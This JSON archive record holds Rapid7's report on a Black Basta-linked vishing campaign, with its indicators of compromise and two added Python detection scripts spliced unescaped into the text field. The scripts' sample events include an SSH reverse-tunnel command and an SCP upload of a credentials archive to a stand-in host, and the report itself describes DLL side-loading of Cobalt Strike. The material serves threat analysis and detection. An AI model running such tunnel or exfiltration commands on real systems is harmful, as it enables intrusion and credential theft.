{
	"id": "46a14f62-2607-4ba4-a26e-480e335e95ca",
	"created_at": "2026-04-06T00:17:58.762263Z",
	"updated_at": "2026-04-10T13:11:23.876971Z",
	"deleted_at": null,
	"sha1_hash": "66c819109927dfaea9ac8548f5387141d6f36cc4",
	"title": "Ongoing Social Engineering Campaign Linked to Black Basta Ransomware Operators",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1433743,
	"plain_text": "Ongoing Social Engineering Campaign Linked to Black Basta\r\nRansomware Operators\r\nBy Rapid7\r\nPublished: 2024-05-10 · Archived: 2026-04-05 22:28:01 UTC\r\nCo-authored by Rapid7 analysts Tyler McGraw, Thomas Elkins, and Evan McCann\r\nExecutive Summary\r\nRapid7 has identified an ongoing social engineering campaign that has been targeting multiple managed detection and response (MDR) customers. The threat actor overwhelms a user's inbox with junk email and then calls the user, offering assistance. The threat actor prompts impacted users to download remote monitoring and management (RMM) software such as AnyDesk, or to use Microsoft's built-in Quick Assist feature, in order to establish a remote connection. Once a remote connection has been established, the threat actor downloads payloads from their infrastructure in order to harvest the impacted user's credentials and maintain persistence on the impacted user's asset.\r\nIn one incident, Rapid7 observed the threat actor deploying Cobalt Strike beacons to other assets within the compromised network. While ransomware deployment was not observed in any of the cases Rapid7 responded to, the indicators of compromise we observed were previously linked with the Black Basta ransomware operators based on OSINT and other incident response engagements handled by Rapid7.\r\nOverview\r\nSince late April 2024, Rapid7 has identified multiple cases of a novel social engineering campaign. The attacks begin with a group of users in the target environment receiving a large volume of spam emails. In all observed cases, the spam was significant enough to overwhelm the email protection solutions in place and arrived in the user’s inbox. 
Rapid7 determined many of the emails themselves were not malicious, but rather consisted of newsletter sign-up confirmation emails from numerous legitimate organizations across the world.\r\nhttps://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/\r\nPage 1 of 10\n\nWith the emails sent, and the impacted users struggling to handle the volume of spam, the threat actor then began to cycle through calling impacted users, posing as a member of their organization’s IT team reaching out to offer support for their email issues. For each user they called, the threat actor attempted to socially engineer the user into providing remote access to their computer through the use of legitimate remote monitoring and management solutions. In all observed cases, Rapid7 determined initial access was facilitated by either the download and execution of the commonly abused RMM solution AnyDesk, or the built-in Windows remote support utility Quick Assist.\r\nIn the event the threat actor’s social engineering attempts were unsuccessful in getting a user to provide remote access, Rapid7 observed they immediately moved on to another user who had been targeted with their mass spam emails.\r\nOnce the threat actor successfully gains access to a user’s computer, they begin executing a series of batch scripts, presented to the user as updates, likely in an attempt to appear more legitimate and evade suspicion. The first batch script executed by the threat actor typically verifies connectivity to their command and control (C2) server and then downloads a zip archive containing a legitimate copy of OpenSSH for Windows (ultimately renamed to RuntimeBroker.exe), along with its dependencies, several RSA keys, and other Secure Shell (SSH) configuration files. SSH is a protocol used to securely send commands to remote computers over the internet. 
While there are hard-coded C2 servers in many of the batch scripts, some are written so the C2 server and listening port can be specified on the command line as an override.\r\nThe script then establishes persistence via run key entries in the Windows registry. The run keys created by the batch script point to additional batch scripts that are created at run time. Each batch script pointed to by the run keys executes SSH via PowerShell in an infinite loop to attempt to establish a reverse shell connection to the specified C2 server using the downloaded RSA private key. Rapid7 observed several different variations of the batch scripts used by the threat actor, some of which also conditionally establish persistence using other remote monitoring and management solutions, including NetSupport and ScreenConnect.\r\nIn all observed cases, Rapid7 has identified the usage of a batch script to harvest the victim’s credentials from the command line using PowerShell. The credentials are gathered under the false context of the “update” requiring the user to log in. In most of the observed batch script variations, the credentials are immediately exfiltrated to the threat actor’s server via a Secure Copy (SCP) command. 
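The persistence and credential-theft chain described in the two paragraphs above leaves a recognisable footprint in process-creation telemetry: a binary whose PE original file name is ssh.exe or scp.exe running under another name, ssh launched with a remote port forward (-R) and a private key file (-i), reg.exe adding a Run value whose data is a .bat file, and scp pushing a file to a remote user@host. The Python below is an added example written for this page, not Rapid7 code and not one of Rapid7's detection rules. It assumes Sysmon Event ID 1 style fields (Image, OriginalFileName, CommandLine) and that the OpenSSH binaries carry their original name in the PE version resource; the sample events, staging paths, hostnames and the address 203.0.113.10 are constructed for the example.

```python
# Added example, not Rapid7 code: triage process-creation events for the
# renamed OpenSSH, SSH reverse tunnel, Run-key batch persistence and SCP
# upload behaviour described in the report. Field names mimic Sysmon
# Event ID 1 (Image, OriginalFileName, CommandLine); the events are constructed.
import re
from pathlib import PureWindowsPath

# Assumption: OpenSSH for Windows keeps its original name in the PE version
# resource, so a renamed copy (RuntimeBroker.exe) still reports ssh.exe here.
SSH_ORIGINAL_NAMES = {'ssh.exe', 'scp.exe', 'sftp.exe'}

def base_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def renamed_openssh(ev: dict) -> bool:
    orig = ev.get('OriginalFileName', '').lower()
    return orig in SSH_ORIGINAL_NAMES and base_name(ev['Image']) != orig

def ssh_reverse_tunnel(ev: dict) -> bool:
    # -R <port>:<host>:<port> plus -i <key>: the remote port forward that
    # gives the operator a way back in through the firewall.
    cl = ev['CommandLine']
    return (re.search(r'(^| )-R *[0-9]+:', cl) is not None
            and re.search(r'(^| )-i +[^ ]+', cl) is not None)

def run_key_batch_persistence(ev: dict) -> bool:
    # reg.exe adding a CurrentVersion Run value whose data is a .bat/.cmd file.
    cl = ev['CommandLine'].lower()
    return (base_name(ev['Image']) == 'reg.exe'
            and ' add ' in cl and 'currentversion' in cl
            and re.search(r'[.](bat|cmd)( |$)', cl) is not None)

def scp_upload(ev: dict) -> bool:
    # scp (under any name) with a user@host: target, the exfil step for the harvested credentials.
    return (ev.get('OriginalFileName', '').lower() == 'scp.exe'
            and re.search(r'[^ ]+@[^ ]+:', ev['CommandLine']) is not None)

CHECKS = [
    ('renamed_openssh', renamed_openssh),
    ('ssh_reverse_tunnel', ssh_reverse_tunnel),
    ('run_key_batch_persistence', run_key_batch_persistence),
    ('scp_upload', scp_upload),
]

def triage(events):
    # Returns (image base name, check name) for every check an event trips.
    findings = []
    for ev in events:
        for name, check in CHECKS:
            if check(ev):
                findings.append((base_name(ev['Image']), name))
    return findings

def wp(p: str) -> str:
    # Sample paths are written with forward slashes; PureWindowsPath renders
    # them with the Windows separator so the samples look like real telemetry.
    return str(PureWindowsPath(p))

RUN_KEY = wp('HKCU/Software/Microsoft/Windows/CurrentVersion/Run')
STAGING = 'C:/Users/Public'
SAMPLE_EVENTS = [  # constructed, not from a real incident
    {'Image': wp(STAGING + '/RuntimeBroker.exe'), 'OriginalFileName': 'ssh.exe',
     'CommandLine': wp(STAGING + '/RuntimeBroker.exe') + ' -o StrictHostKeyChecking=no -i '
                    + wp(STAGING + '/id_rsa') + ' -R 8080:127.0.0.1:22 user@203.0.113.10'},
    {'Image': wp('C:/Windows/System32/reg.exe'), 'OriginalFileName': 'reg.exe',
     'CommandLine': 'reg add ' + RUN_KEY + ' /v RuntimeBroker /t REG_SZ /d '
                    + wp(STAGING + '/update.bat') + ' /f'},
    {'Image': wp(STAGING + '/scp.exe'), 'OriginalFileName': 'scp.exe',
     'CommandLine': wp(STAGING + '/scp.exe') + ' -i ' + wp(STAGING + '/id_rsa') + ' '
                    + wp(STAGING + '/creds.zip') + ' user@203.0.113.10:/tmp/'},
    # benign: the real OpenSSH client and a Run value that is not a batch file
    {'Image': wp('C:/Windows/System32/OpenSSH/ssh.exe'), 'OriginalFileName': 'ssh.exe',
     'CommandLine': 'ssh admin@jumphost.corp.example'},
    {'Image': wp('C:/Windows/System32/reg.exe'), 'OriginalFileName': 'reg.exe',
     'CommandLine': 'reg add ' + RUN_KEY + ' /v OneDrive /t REG_SZ /d '
                    + wp('C:/Users/alice/AppData/Local/Microsoft/OneDrive/OneDrive.exe') + ' /f'},
]

if __name__ == '__main__':
    for image, check in triage(SAMPLE_EVENTS):
        print(image, check)
```

Each check is deliberately narrow so the two benign events (the real ssh.exe under System32 and a Run value pointing at an .exe) produce nothing; in a real pipeline you would feed triage() the parsed events from your EDR or Sysmon channel and escalate any host that trips more than one check within a short window, since the renamed binary, the tunnel and the Run key all appear together in this campaign.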
In at least one other observed script variant, credentials are saved to an archive and must be manually retrieved.\r\nIn one observed case, once the initial compromise was completed, the threat actor then attempted to move laterally throughout the environment via SMB using Impacket, and ultimately failed to deploy Cobalt Strike despite several attempts. While Rapid7 did not observe successful data exfiltration or ransomware deployment in any of our investigations, the indicators of compromise found via forensic analysis conducted by Rapid7 are consistent with the Black Basta ransomware group based on internal and open source intelligence.\r\nForensic Analysis\r\nIn one incident, Rapid7 observed the threat actor attempting to deploy additional remote monitoring and management tools, including ScreenConnect and the NetSupport remote access trojan (RAT). Rapid7 acquired the Client32.ini file, which holds the configuration data for the NetSupport RAT, including the domains used for the connection. 
Rapid7 observed the NetSupport RAT attempt communication with the following domains:\r\nrewilivak13[.]com\r\ngreekpool[.]com\r\nAfter gaining access to the compromised asset, the threat actor attempted to deploy Cobalt Strike beacons, disguised as a legitimate Dynamic Link Library (DLL) named 7z.DLL, to other assets within the same network using the Impacket toolset.\r\nIn our analysis of 7z.DLL, Rapid7 observed the DLL was altered to include a function whose purpose was to XOR-decrypt the Cobalt Strike beacon using a hard-coded key and then execute the beacon.\r\nThe threat actor would attempt to deploy the Cobalt Strike beacon by executing the legitimate binary 7zG.exe and passing a command line argument of `b`, i.e. `C:\\Users\\Public\\7zG.exe b`. By doing so, the legitimate binary 7zG.exe side-loads 7z.DLL, which in turn executes the embedded Cobalt Strike beacon. This technique is known as DLL side-loading, a method Rapid7 previously discussed in a blog post on the IDAT Loader.\r\nUpon successful execution, Rapid7 observed the beacon inject into a newly created choice.exe process.\r\nMitigations\r\nRapid7 recommends baselining your environment for all installed remote monitoring and management solutions and utilizing application allowlisting solutions, such as AppLocker or Microsoft Defender Application Control, to block all unapproved RMM solutions from executing within the environment. For example, the Quick Assist tool, quickassist.exe, can be blocked from execution via AppLocker. As an additional precaution, Rapid7 recommends blocking domains associated with all unapproved RMM solutions. 
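Blocking the domains of unapproved RMM tools and watching for this report's network indicators are the same mechanical check: normalise the indicator list (the report defangs domains and addresses with [.]), add the domains of every RMM tool that is not on your approved list, and compare each DNS query name (and any parent domain of it) plus the answer address against that set. The Python below is an added example for this page, not Rapid7 code. The only real indicators in it are the domains and addresses from the Indicators of Compromise section of this report; the RMM catalog entries, the choice of approved tool, the log format and the DNS log lines are all constructed for the example.

```python
# Added example, not Rapid7 code: refang the report's network indicators,
# add the domains of every RMM tool that is not approved, and scan DNS query
# logs for hits on the query name (or any parent domain) and the answer IP.
import ipaddress
import re

def refang(ioc: str) -> str:
    # Threat reports defang with [.] (and hxxp); undo that before matching.
    return ioc.strip().lower().replace('[.]', '.').replace('hxxp', 'http')

# Indicators from this report, kept in their defanged form.
REPORT_IOCS = [
    'upd7[.]com', 'upd7a[.]com', 'greekpool[.]com', 'rewilivak13[.]com',
    'limitedtoday[.]com', 'thetrailbig[.]net',
    '195.123.233[.]55', '38.180.142[.]249', '15.235.218[.]150', '77.246.101[.]135',
]

# Constructed stand-in for an RMM catalog (tool -> domains); only tools in
# APPROVED_RMM may resolve. Replace with your real inventory and catalog.
RMM_CATALOG = {
    'anydesk': ['anydesk.com', 'net.anydesk.com'],
    'screenconnect': ['screenconnect.com'],
    'netsupport': ['netsupportsoftware.com'],
}
APPROVED_RMM = {'screenconnect'}

def build_blocklist():
    # Split indicators into a domain set and an IP set; catalog domains of
    # unapproved tools join the domain set.
    domains, ips = set(), set()
    for ioc in map(refang, REPORT_IOCS):
        try:
            ips.add(str(ipaddress.ip_address(ioc)))
        except ValueError:
            domains.add(ioc)
    for tool, tool_domains in RMM_CATALOG.items():
        if tool not in APPROVED_RMM:
            domains.update(tool_domains)
    return domains, ips

def domain_hit(qname: str, domains: set):
    # Walk up the label chain so www.greekpool.com matches greekpool.com;
    # the range stops one short so a bare TLD can never match.
    labels = qname.lower().rstrip('.').split('.')
    for i in range(len(labels) - 1):
        candidate = '.'.join(labels[i:])
        if candidate in domains:
            return candidate
    return None

# Constructed log format: <timestamp> <client ip> query <name> [answer <ip>]
LOG_RE = re.compile(r'^(?P<ts>[^ ]+) (?P<src>[^ ]+) query (?P<qname>[^ ]+)( answer (?P<answer>[^ ]+))?$')

SAMPLE_LOG = [  # constructed for this example
    '2024-05-02T14:03:11Z 10.0.0.25 query www.greekpool.com answer 198.51.100.7',
    '2024-05-02T14:03:12Z 10.0.0.25 query net.anydesk.com answer 198.51.100.8',
    '2024-05-02T14:03:13Z 10.0.0.31 query relay.screenconnect.com answer 198.51.100.9',
    '2024-05-02T14:03:14Z 10.0.0.25 query updates.example.org answer 195.123.233.55',
    '2024-05-02T14:03:15Z 10.0.0.40 query www.example.org answer 93.184.216.34',
]

def scan(lines):
    # Returns (client, query name, reason) for every line that hits the blocklist.
    domains, ips = build_blocklist()
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        matched = domain_hit(m['qname'], domains)
        if matched:
            hits.append((m['src'], m['qname'], 'domain:' + matched))
        elif m['answer'] in ips:
            hits.append((m['src'], m['qname'], 'ip:' + m['answer']))
    return hits

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

In production, feed scan() your resolver or proxy logs and keep APPROVED_RMM in sync with the RMM baseline the mitigation above asks for; the answer-address check is what catches a new hostname placed in front of an address you already know, which is why the report lists raw IPv4 addresses alongside domains.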
A public GitHub repo containing a catalog of RMM solutions, their binary names, and associated domains is linked from the original post.\r\nRapid7 recommends ensuring users are aware of established IT channels and communication methods so that they can identify and resist common social engineering attacks. We also recommend ensuring users are empowered to report suspicious phone calls and texts purporting to be from internal IT staff.\r\nMITRE ATT\u0026CK Techniques\r\nTactic | Technique | Procedure\r\nImpact | T1498: Network Denial of Service | The threat actor overwhelms email protection solutions with spam.\r\nInitial Access | T1566.004: Phishing: Spearphishing Voice | The threat actor calls impacted users and pretends to be a member of their organization’s IT team to gain remote access.\r\nExecution | T1059.003: Command and Scripting Interpreter: Windows Command Shell | The threat actor executes batch scripts after establishing remote access to a user’s asset.\r\nExecution | T1059.001: Command and Scripting Interpreter: PowerShell | Batch scripts used by the threat actor execute certain commands via PowerShell.\r\nPersistence | T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | The threat actor creates a run key to execute a batch script via PowerShell, which then attempts to establish a reverse tunnel via SSH.\r\nDefense Evasion | T1222.001: File and Directory Permissions Modification: Windows File and Directory Permissions Modification | The threat actor uses cacls.exe via batch script to modify file permissions.\r\nDefense Evasion | T1140: Deobfuscate/Decode Files or Information | The threat actor encrypted several zip archive payloads with the password “qaz123”.\r\nCredential Access | T1056.001: Input Capture: Keylogging | The threat actor runs a batch script that records the user’s password via command line input.\r\nDiscovery | T1033: System Owner/User Discovery | The threat actor uses whoami.exe to evaluate whether the impacted user is an administrator.\r\nLateral Movement | T1570: Lateral Tool Transfer | Impacket was used to move payloads between compromised systems.\r\nCommand and Control | T1572: Protocol Tunneling | An SSH reverse tunnel is used to provide the threat actor with persistent remote access.\r\nRapid7 Customers\r\nInsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to this malware campaign:\r\nDetections\r\nAttacker Technique - Renamed SSH For Windows\r\nPersistence - Run Key Added by Reg.exe\r\nSuspicious Process - Non Approved Application\r\nSuspicious Process - 7zip Executed From Users Directory (InsightIDR-only customers should evaluate and determine whether they would like to activate this detection within the InsightIDR detection library; this detection is currently active for MDR/MTC customers)\r\nAttacker Technique - Enumerating Domain Or Enterprise Admins With Net Command\r\nNetwork Discovery - Domain Controllers via Net.exe\r\nIndicators of Compromise\r\nNetwork Based Indicators (NBIs)\r\nDomain/IPv4 Address | Notes\r\nupd7[.]com | Batch script and remote access tool host.\r\nupd7a[.]com | Batch script and remote access tool host.\r\n195.123.233[.]55 | C2 server contained within batch scripts.\r\n38.180.142[.]249 | C2 server contained within batch scripts.\r\n5.161.245[.]155 | C2 server contained within batch scripts.\r\n20.115.96[.]90 | C2 server contained within batch scripts.\r\n91.90.195[.]52 | C2 server contained within batch scripts.\r\n195.123.233[.]42 | C2 server contained within batch scripts.\r\n15.235.218[.]150 | AnyDesk server used by the threat actor.\r\ngreekpool[.]com | Primary NetSupport RAT gateway.\r\nrewilivak13[.]com | Secondary NetSupport RAT gateway.\r\n77.246.101[.]135 | C2 address used to connect via AnyDesk.\r\nlimitedtoday[.]com | Cobalt Strike C2 domain.\r\nthetrailbig[.]net | Cobalt Strike C2 domain.\r\nHost-based indicators (HBIs)\r\nFile | SHA256 | Notes\r\ns.zip | C18E7709866F8B1A271A54407973152BE1036AD3B57423101D7C3DA98664D108 | Payload containing SSH config files used by the threat actor.\r\nid_rsa | 59F1C5FE47C1733B84360A72E419A07315FBAE895DD23C1E32F1392E67313859 | Private RSA key that is downloaded to impacted assets.\r\nid_rsa_client | 2EC12F4EE375087C921BE72F3BD87E6E12A2394E8E747998676754C9E3E9798E | Private RSA key that is downloaded to impacted assets.\r\nauthorized_keys | 35456F84BC88854F16E316290104D71A1F350E84B479EEBD6FBB2F77D36BCA8A | Authorized key downloaded to impacted assets by the threat actor.\r\nRuntimeBroker.exe | 6F31CF7A11189C683D8455180B4EE6A60781D2E3F3AADF3ECC86F578D480CFA9 | Renamed copy of the legitimate OpenSSH for Windows utility.\r\na.zip | A47718693DC12F061692212A354AFBA8CA61590D8C25511C50CFECF73534C750 | Payload that contains a batch script and the legitimate ScreenConnect setup executable.\r\na3.zip | 76F959205D0A0C40F3200E174DB6BB030A1FDE39B0A190B6188D9C10A0CA07C8 | Contains a credential harvesting batch script.\r\nSource: https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/"
	],
	"report_names": [
		"ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434678,
	"ts_updated_at": 1775826683,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/66c819109927dfaea9ac8548f5387141d6f36cc4.pdf",
		"text": "https://archive.orkl.eu/66c819109927dfaea9ac8548f5387141d6f36cc4.txt",
		"img": "https://archive.orkl.eu/66c819109927dfaea9ac8548f5387141d6f36cc4.jpg"
	}
}